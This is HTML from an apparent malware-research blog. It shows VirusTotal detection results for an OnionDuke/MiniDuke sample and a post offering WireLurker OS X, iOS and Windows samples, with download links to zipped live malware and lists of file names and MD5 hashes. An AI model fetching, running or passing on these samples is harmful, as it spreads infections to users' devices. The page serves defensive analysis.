Detection ratio:<span class="Apple-tab-span" style="white-space: pre;"> </span>8 / 52</div>
<div style="font-size: 14px; line-height: 19.6000003814697px;">
<span style="line-height: 19.6000003814697px;">Antivirus</span><span class="Apple-tab-span" style="line-height: 19.6000003814697px; white-space: pre;"> </span><span style="line-height: 19.6000003814697px;">Result</span><span class="Apple-tab-span" style="line-height: 19.6000003814697px; white-space: pre;"> </span><span style="line-height: 19.6000003814697px;">Update</span></div>
<div style="font-size: 14px; line-height: 19.6000003814697px;">
Baidu-International<span class="Apple-tab-span" style="white-space: pre;"> </span>Trojan.Win32.Agent.adYf<span class="Apple-tab-span" style="white-space: pre;"> </span>20141107</div>
<div style="font-size: 14px; line-height: 19.6000003814697px;">
F-Secure<span class="Apple-tab-span" style="white-space: pre;"> </span>Backdoor:W32/OnionDuke.B<span class="Apple-tab-span" style="white-space: pre;"> </span>20141115</div>
<div style="font-size: 14px; line-height: 19.6000003814697px;">
Ikarus<span class="Apple-tab-span" style="white-space: pre;"> </span>Trojan.Win32.Agent<span class="Apple-tab-span" style="white-space: pre;"> </span>20141115</div>
<div style="font-size: 14px; line-height: 19.6000003814697px;">
Kaspersky<span class="Apple-tab-span" style="white-space: pre;"> </span>Backdoor.Win32.MiniDuke.x<span class="Apple-tab-span" style="white-space: pre;"> </span>20141115</div>
<div style="font-size: 14px; line-height: 19.6000003814697px;">
Norman<span class="Apple-tab-span" style="white-space: pre;"> </span>OnionDuke.A<span class="Apple-tab-span" style="white-space: pre;"> </span>20141115</div>
<div style="font-size: 14px; line-height: 19.6000003814697px;">
Sophos<span class="Apple-tab-span" style="white-space: pre;"> </span>Troj/Ransom-ALA<span class="Apple-tab-span" style="white-space: pre;"> </span>20141115</div>
<div style="font-size: 14px; line-height: 19.6000003814697px;">
Symantec<span class="Apple-tab-span" style="white-space: pre;"> </span>Backdoor.Miniduke!gen4<span class="Apple-tab-span" style="white-space: pre;"> </span>20141115</div>
<div style="font-size: 14px; line-height: 19.6000003814697px;">
Tencent<span class="Apple-tab-span" style="white-space: pre;"> </span>Win32.Trojan.Agent.Tbsl<span class="Apple-tab-span" style="white-space: pre;"> </span>20141115</div>
<div style="font-size: 14px; line-height: 19.6000003814697px;">
<br /></div>
<div>
<div>
<span style="font-size: 14px; line-height: 19.6000003814697px;">https://www.virustotal.com/en/file/0102777ec0357655c4313419be3a15c4ca17c4f9cb4a440bfb16195239905ade/analysis/</span></div>
<div>
<span style="font-size: 14px; line-height: 19.6000003814697px;">SHA256:<span class="Apple-tab-span" style="white-space: pre;"> </span>0102777ec0357655c4313419be3a15c4ca17c4f9cb4a440bfb16195239905ade</span></div>
<div>
<span style="font-size: 14px; line-height: 19.6000003814697px;">File name:<span class="Apple-tab-span" style="white-space: pre;"> </span>0102777ec0357655c4313419be3a15c4ca17c4f9cb4a440bfb16195239905ade</span></div>
<div>
<span style="font-size: 14px; line-height: 19.6000003814697px;">Detection ratio:<span class="Apple-tab-span" style="white-space: pre;"> </span>19 / 55</span></div>
<div>
<span style="font-size: 14px; line-height: 19.6000003814697px;">Analysis date:<span class="Apple-tab-span" style="white-space: pre;"> </span>2014-11-15 18:37:25 UTC ( 8 hours, 47 minutes ago ) </span></div>
<div>
<span style="font-size: 14px; line-height: 19.6000003814697px;">Antivirus</span><span class="Apple-tab-span" style="font-size: 14px; line-height: 19.6000003814697px; white-space: pre;"> </span><span style="font-size: 14px; line-height: 19.6000003814697px;">Result</span><span class="Apple-tab-span" style="font-size: 14px; line-height: 19.6000003814697px; white-space: pre;"> </span><span style="font-size: 14px; line-height: 19.6000003814697px;">Update</span></div>
<div>
<span style="font-size: 14px; line-height: 19.6000003814697px;">AVware<span class="Apple-tab-span" style="white-space: pre;"> </span>Trojan.Win32.Generic!BT<span class="Apple-tab-span" style="white-space: pre;"> </span>20141115</span></div>
<div>
<span style="font-size: 14px; line-height: 19.6000003814697px;">Ad-Aware<span class="Apple-tab-span" style="white-space: pre;"> </span>Backdoor.Generic.933739<span class="Apple-tab-span" style="white-space: pre;"> </span>20141115</span></div>
<div>
<span style="font-size: 14px; line-height: 19.6000003814697px;">Baidu-International<span class="Apple-tab-span" style="white-space: pre;"> </span>Trojan.Win32.OnionDuke.BA<span class="Apple-tab-span" style="white-space: pre;"> </span>20141107</span></div>
<div>
<span style="font-size: 14px; line-height: 19.6000003814697px;">BitDefender<span class="Apple-tab-span" style="white-space: pre;"> </span>Backdoor.Generic.933739<span class="Apple-tab-span" style="white-space: pre;"> </span>20141115</span></div>
<div>
<span style="font-size: 14px; line-height: 19.6000003814697px;">ESET-NOD32<span class="Apple-tab-span" style="white-space: pre;"> </span>a variant of Win32/OnionDuke.A<span class="Apple-tab-span" style="white-space: pre;"> </span>20141115</span></div>
<div>
<span style="font-size: 14px; line-height: 19.6000003814697px;">Emsisoft<span class="Apple-tab-span" style="white-space: pre;"> </span>Backdoor.Generic.933739 (B)<span class="Apple-tab-span" style="white-space: pre;"> </span>20141115</span></div>
<div>
<span style="font-size: 14px; line-height: 19.6000003814697px;">F-Secure<span class="Apple-tab-span" style="white-space: pre;"> </span>Backdoor:W32/OnionDuke.A<span class="Apple-tab-span" style="white-space: pre;"> </span>20141115</span></div>
<div>
<span style="font-size: 14px; line-height: 19.6000003814697px;">GData<span class="Apple-tab-span" style="white-space: pre;"> </span>Backdoor.Generic.933739<span class="Apple-tab-span" style="white-space: pre;"> </span>20141115</span></div>
<div>
<span style="font-size: 14px; line-height: 19.6000003814697px;">Ikarus<span class="Apple-tab-span" style="white-space: pre;"> </span>Trojan.Win32.Onionduke<span class="Apple-tab-span" style="white-space: pre;"> </span>20141115</span></div>
<div>
<span style="font-size: 14px; line-height: 19.6000003814697px;">Kaspersky<span class="Apple-tab-span" style="white-space: pre;"> </span>Backdoor.Win32.MiniDuke.x<span class="Apple-tab-span" style="white-space: pre;"> </span>20141115</span></div>
<div>
<span style="font-size: 14px; line-height: 19.6000003814697px;">McAfee<span class="Apple-tab-span" style="white-space: pre;"> </span>RDN/Generic BackDoor!zw<span class="Apple-tab-span" style="white-space: pre;"> </span>20141115</span></div>
<div>
<span style="font-size: 14px; line-height: 19.6000003814697px;">McAfee-GW-Edition<span class="Apple-tab-span" style="white-space: pre;"> </span>BehavesLike.Win32.Trojan.fh<span class="Apple-tab-span" style="white-space: pre;"> </span>20141114</span></div>
<div>
<span style="font-size: 14px; line-height: 19.6000003814697px;">MicroWorld-eScan<span class="Apple-tab-span" style="white-space: pre;"> </span>Backdoor.Generic.933739<span class="Apple-tab-span" style="white-space: pre;"> </span>20141115</span></div>
<div>
<span style="font-size: 14px; line-height: 19.6000003814697px;">Norman<span class="Apple-tab-span" style="white-space: pre;"> </span>OnionDuke.B<span class="Apple-tab-span" style="white-space: pre;"> </span>20141115</span></div>
<div>
<span style="font-size: 14px; line-height: 19.6000003814697px;">Sophos<span class="Apple-tab-span" style="white-space: pre;"> </span>Troj/Ransom-ANU<span class="Apple-tab-span" style="white-space: pre;"> </span>20141115</span></div>
<div>
<span style="font-size: 14px; line-height: 19.6000003814697px;">Symantec<span class="Apple-tab-span" style="white-space: pre;"> </span>Backdoor.Miniduke!gen4<span class="Apple-tab-span" style="white-space: pre;"> </span>20141115</span></div>
<div>
<span style="font-size: 14px; line-height: 19.6000003814697px;">TrendMicro<span class="Apple-tab-span" style="white-space: pre;"> </span>BKDR_ONIONDUKE.AD<span class="Apple-tab-span" style="white-space: pre;"> </span>20141115</span></div>
<div>
<span style="font-size: 14px; line-height: 19.6000003814697px;">TrendMicro-HouseCall<span class="Apple-tab-span" style="white-space: pre;"> </span>BKDR_ONIONDUKE.AD<span class="Apple-tab-span" style="white-space: pre;"> </span>20141115</span></div>
<div>
<span style="font-size: 14px; line-height: 19.6000003814697px;">VIPRE<span class="Apple-tab-span" style="white-space: pre;"> </span>Trojan.Win32.Generic!BT<span class="Apple-tab-span" style="white-space: pre;"> </span>20141115</span></div>
</div>
</span></div>
<div style="font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">
<br /></div>
<div style="font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">
<div style="line-height: 19.6000003814697px;">
<br /></div>
</div>
</div>
</div>
</div>
</div>
Milahttp://www.blogger.com/profile/09472209631979859691noreply@blogger.com0tag:blogger.com,1999:blog-7885177434994542510.post-25964902625700141462014-11-06T20:57:00.001-05:002014-11-06T20:59:50.106-05:00Wirelurker for OSX, iOS (Part I) and Windows (Part II) samples<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<b style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;"><u>PART II</u></b><br />
<b style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;"><u><br /></u></b>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidSoje6ZqnKBqk-OHKjrfeHakJ0qz5DmKTFulqoKSyBDPE676Hd5VVU8fgSk_9JIbw4MlyeB9_mhFgPq9VkFCLlkAguU6s7G7gLMgtylT0_UkvybyuLOaALnRRMx3nYwTVu0d70VrETjg/s1600/wlww.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidSoje6ZqnKBqk-OHKjrfeHakJ0qz5DmKTFulqoKSyBDPE676Hd5VVU8fgSk_9JIbw4MlyeB9_mhFgPq9VkFCLlkAguU6s7G7gLMgtylT0_UkvybyuLOaALnRRMx3nYwTVu0d70VrETjg/s1600/wlww.PNG" height="135" width="320" /></a><b><span style="color: #38761d;">Wirelurker for Windows (WinLurker)</span></b><br />
<br />
<b><a href="http://researchcenter.paloaltonetworks.com/2014/11/wirelurker-windows/#more-7274">Research: <span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">Palo Alto Claud <i>Xiao: Wirelurker for Windows</i></span></a></b><br />
<u><b><br /></b></u>
Sample credit: Claud Xiao<br />
<u><b><br /></b></u>
<u><b><br /></b></u><u><b></b></u><br />
<div style="text-align: left;">
<u><b><b style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;"><u>PART I</u></b></b></u></div>
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgho96PXaTBEc1i18TxcG2jKsdVfF7TeErhUUqN7DBKEjOorUAi6ESnBgzcsvFALSubMFxMzI69Kx6LMkkS6ujQZIitC5pGVwMwR4WcahadsMtkGS9-NxYAmhy5mMtvPCcH8Y_YZN7Yh7wX/s1600/wl.PNG" imageanchor="1" style="background-color: white; clear: left; color: #660000; float: left; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px; margin-bottom: 1em; margin-right: 1em; text-decoration: none;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgho96PXaTBEc1i18TxcG2jKsdVfF7TeErhUUqN7DBKEjOorUAi6ESnBgzcsvFALSubMFxMzI69Kx6LMkkS6ujQZIitC5pGVwMwR4WcahadsMtkGS9-NxYAmhy5mMtvPCcH8Y_YZN7Yh7wX/s1600/wl.PNG" height="200" style="-webkit-box-shadow: rgba(0, 0, 0, 0) 1px 1px 5px; background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 1px solid rgb(255, 255, 255); box-shadow: rgba(0, 0, 0, 0) 1px 1px 5px; padding: 0px; position: relative;" width="153" /></a><b><span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">Research: Palo Alto Claud Xiao </span><a href="https://www.paloaltonetworks.com/content/dam/paloaltonetworks-com/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf" style="background-color: white; color: #660000; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px; text-decoration: none;" target="_blank"><i>WIRELURKER: A New Era in iOS and OS X Malware</i></a><br style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;" /><br style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;" /><span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">Palo Alto |Claud Xiao - blog post </span><a href="http://researchcenter.paloaltonetworks.com/2014/11/wirelurker-new-era-os-x-ios-malware/" style="background-color: white; color: #660000; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px; text-decoration: none;" target="_blank"><i>Wirelurker</i></a><br style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;" /><br style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;" /><span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">Wirelurker Detector </span><i style="background-color: white; color: #660000; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;"><a href="https://github.com/PaloAltoNetworks-BD/WireLurkerDetector" style="color: #660000; line-height: 19.6000003814697px; text-decoration: none;">https://github.com/PaloAltoNetworks-BD/WireLurkerDetector</a></i></b><br />
<br />
<span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">Sample credit: Claud Xiao</span><br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<br />
<div style="background-color: #618f2b; color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19px; text-align: center;">
<span style="font-family: 'Courier New', Courier, monospace;"><b>Download</b></span></div>
<div style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">
</div>
<br style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;" />
<b style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;"><a href="http://www.mediafire.com/download/ke6ihre6t7qxdvp/Trojan_OSX_iOS_WireLurker.zip" style="color: #660000; text-decoration: none;" target="_blank">Download Part I</a></b><br />
<b style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;"><a href="http://www.mediafire.com/download/a0obzj8a6n9eao1/Trojan_Win32_WireLurker.zip">Download Part II</a></b><br />
<br />
<b style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;"><a href="http://www.mediafire.com/download/ke6ihre6t7qxdvp/Trojan_OSX_iOS_WireLurker.zip" style="color: #660000; text-decoration: none;" target="_blank">Email me if you need the password</a></b><br />
<br />
<br />
<a name='more'></a><br />
<br />
<div style="background-color: #618f2b; color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19px; text-align: center;">
<span style="font-family: 'Courier New', Courier, monospace;"><b>List of files</b></span></div>
<div style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">
</div>
<b style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">List of hashes </b><br />
<b style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;"><u><br /></u></b>
<b style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;"><u>Part II</u></b><br />
<b style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;"><br /></b>
<span style="font-family: Trebuchet MS, Trebuchet, sans-serif;"><span style="font-size: 14px; line-height: 19.6000003814697px;">s+«sìÜ 3.4.1.dmg<span class="Apple-tab-span" style="white-space: pre;"> </span>925cc497f207ec4dbcf8198a1b785dbd</span></span><br />
<div>
<span style="font-family: Trebuchet MS, Trebuchet, sans-serif;"><span style="font-size: 14px; line-height: 19.6000003814697px;">apps.ipa<span class="Apple-tab-span" style="white-space: pre;"> </span>54d27da968c05d463ad3168285ec6097</span></span><br />
<span style="font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">WhatsAppMessenger 2.11.7.exe</span><span class="Apple-tab-span" style="font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px; white-space: pre;"> </span><span style="font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">eca91fa7e7350a4d2880d341866adf35</span><br />
<span style="font-family: Trebuchet MS, Trebuchet, sans-serif;"><span style="font-size: 14px; line-height: 19.6000003814697px;">使用说明.txt<span class="Apple-tab-span" style="white-space: pre;"> </span>3506a0c0199ed747b699ade765c0d0f8</span></span><br />
<span style="font-family: Trebuchet MS, Trebuchet, sans-serif;"><span style="font-size: 14px; line-height: 19.6000003814697px;">libxml2.dll<span class="Apple-tab-span" style="white-space: pre;"> </span>c86bebc3d50d7964378c15b27b1c2caa</span></span><br />
<span style="font-family: Trebuchet MS, Trebuchet, sans-serif;"><span style="font-size: 14px; line-height: 19.6000003814697px;">libiconv-2_.dll<span class="Apple-tab-span" style="white-space: pre;"> </span>9c8170dc4a33631881120a467dc3e8f7</span></span><br />
<span style="font-family: Trebuchet MS, Trebuchet, sans-serif;"><span style="font-size: 14px; line-height: 19.6000003814697px;">msvcr100.dll<span class="Apple-tab-span" style="white-space: pre;"> </span>bf38660a9125935658cfa3e53fdc7d65</span></span><br />
<span style="font-family: Trebuchet MS, Trebuchet, sans-serif;"><span style="font-size: 14px; line-height: 19.6000003814697px;">libz_.dll<span class="Apple-tab-span" style="white-space: pre;"> </span>bd3d1f0a3eff8c4dd1e993f57185be75</span></span><br />
<span style="font-family: Trebuchet MS, Trebuchet, sans-serif;"><span style="font-size: 14px; line-height: 19.6000003814697px;">mfc100u.dll<span class="Apple-tab-span" style="white-space: pre;"> </span>f841f32ad816dbf130f10d86fab99b1a</span></span><br />
<span style="font-family: Trebuchet MS, Trebuchet, sans-serif;"><span style="background-color: white; font-size: 14px; line-height: 19.6000003814697px;"></span></span><br />
<span style="font-family: Trebuchet MS, Trebuchet, sans-serif;"><span style="font-size: 14px; line-height: 19.6000003814697px;">zlib1.dll<span class="Apple-tab-span" style="white-space: pre;"> </span>c7d4d685a0af2a09cbc21cb474358595</span></span><br />
<div>
<br /></div>
<br />
<span style="font-family: Trebuchet MS, Trebuchet, sans-serif;"><span style="font-size: 14px; line-height: 19.6000003814697px;">│ apps.ipa</span></span><br />
<span style="font-family: Trebuchet MS, Trebuchet, sans-serif;"><span style="font-size: 14px; line-height: 19.6000003814697px;">│ σ╛«σìÜ 3.4.1.dmg</span></span><br />
<span style="font-family: Trebuchet MS, Trebuchet, sans-serif;"><span style="font-size: 14px; line-height: 19.6000003814697px;">│</span></span><br />
<span style="font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">└───WhatsAppMessenger 2.11.7</span><br />
<span style="font-family: Trebuchet MS, Trebuchet, sans-serif;"><span style="font-size: 14px; line-height: 19.6000003814697px;"> libiconv-2_.dll</span></span><br />
<span style="font-family: Trebuchet MS, Trebuchet, sans-serif;"><span style="font-size: 14px; line-height: 19.6000003814697px;"> libxml2.dll</span></span><br />
<span style="font-family: Trebuchet MS, Trebuchet, sans-serif;"><span style="font-size: 14px; line-height: 19.6000003814697px;"> libz_.dll</span></span><br />
<span style="font-family: Trebuchet MS, Trebuchet, sans-serif;"><span style="font-size: 14px; line-height: 19.6000003814697px;"> mfc100u.dll</span></span><br />
<span style="font-family: Trebuchet MS, Trebuchet, sans-serif;"><span style="font-size: 14px; line-height: 19.6000003814697px;"> msvcr100.dll</span></span><br />
<span style="font-family: Trebuchet MS, Trebuchet, sans-serif;"><span style="font-size: 14px; line-height: 19.6000003814697px;"> WhatsAppMessenger 2.11.7.exe</span></span><br />
<span style="font-family: Trebuchet MS, Trebuchet, sans-serif;"><span style="font-size: 14px; line-height: 19.6000003814697px;"> zlib1.dll</span></span><br />
<span style="font-family: Trebuchet MS, Trebuchet, sans-serif;"><span style="font-size: 14px; line-height: 19.6000003814697px;"> </span></span><span style="font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">使用说明</span><span style="font-family: Trebuchet MS, Trebuchet, sans-serif;"><span style="font-size: 14px; line-height: 19.6000003814697px;">.txt</span></span><br />
<span style="font-family: Trebuchet MS, Trebuchet, sans-serif;"><span style="font-size: 14px; line-height: 19.6000003814697px;"><b><br /></b></span></span>
<br />
<b><u>Part I</u></b><br />
<br />
<span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">BikeBaron</span><span class="Apple-tab-span" style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px; white-space: pre;"> </span><span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">15e8728b410bfffde8d54651a6efd162</span><br />
<span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">CleanApp</span><span class="Apple-tab-span" style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px; white-space: pre;"> </span><span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">c9841e34da270d94b35ae3f724160d5e</span><br />
<span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">com.apple.MailServiceAgentHelper</span><span class="Apple-tab-span" style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px; white-space: pre;"> </span><span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">dca13b4ff64bcd6876c13bbb4a22f450</span><br />
<span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">com.apple.appstore.PluginHelper</span><span class="Apple-tab-span" style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px; white-space: pre;"> </span><span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">c4264b9607a68de8b9bbbe30436f5f28</span><br />
<span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">com.apple.appstore.plughelper.plist</span><span class="Apple-tab-span" style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px; white-space: pre;"> </span><span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">94a933c449948514a3ce634663f9ccf8</span><br />
<span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">com.apple.globalupdate.plist</span><span class="Apple-tab-span" style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px; white-space: pre;"> </span><span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">f92640bed6078075b508c9ffaa7f0a78</span><br />
<span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">com.apple.globalupdate.plist</span><span class="Apple-tab-span" style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px; white-space: pre;"> </span><span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">f92640bed6078075b508c9ffaa7f0a78</span><br />
<span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">com.apple.itunesupdate.plist</span><span class="Apple-tab-span" style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px; white-space: pre;"> </span><span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">83317c311caa225b17ac14d3d504387d</span><br />
<span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">com.apple.machook_damon.plist</span><span class="Apple-tab-span" style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px; white-space: pre;"> </span><span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">6507f0c41663f6d08f497ab41893d8d9</span><br />
<span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">com.apple.machook_damon.plist</span><span class="Apple-tab-span" style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px; white-space: pre;"> </span><span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">6507f0c41663f6d08f497ab41893d8d9</span><br />
<span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">com.apple.MailServiceAgentHelper.plist</span><span class="Apple-tab-span" style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px; white-space: pre;"> </span><span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">e6e6a7845b4e00806da7d5e264eed72b</span><br />
<span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">com.apple.periodic-dd-mm-yy.plist</span><span class="Apple-tab-span" style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px; white-space: pre;"> </span><span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">bda470f4568dae8cb12344a346a181d9</span><br />
<span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">com.apple.systemkeychain-helper.plist</span><span class="Apple-tab-span" style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px; white-space: pre;"> </span><span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">fd7b1215f03ed1221065ee4508d41de3</span><br />
<span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">com.apple.watchproc.plist</span><span class="Apple-tab-span" style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px; white-space: pre;"> </span><span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">af772d9cca45a13ca323f90e7d874c2c</span><br />
<span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">FontMap1.cfg</span><span class="Apple-tab-span" style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px; white-space: pre;"> </span><span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">204b4836a9944d0f19d6df8af3c009d5</span><br />
<span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">foundation</span><span class="Apple-tab-span" style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px; white-space: pre;"> </span><span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">0ff51cd5fe0f88f02213d6612b007a45</span><br />
<span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">globalupdate</span><span class="Apple-tab-span" style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px; white-space: pre;"> </span><span style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">9037cf29ed485dae11e22955724a00e7</span><br />
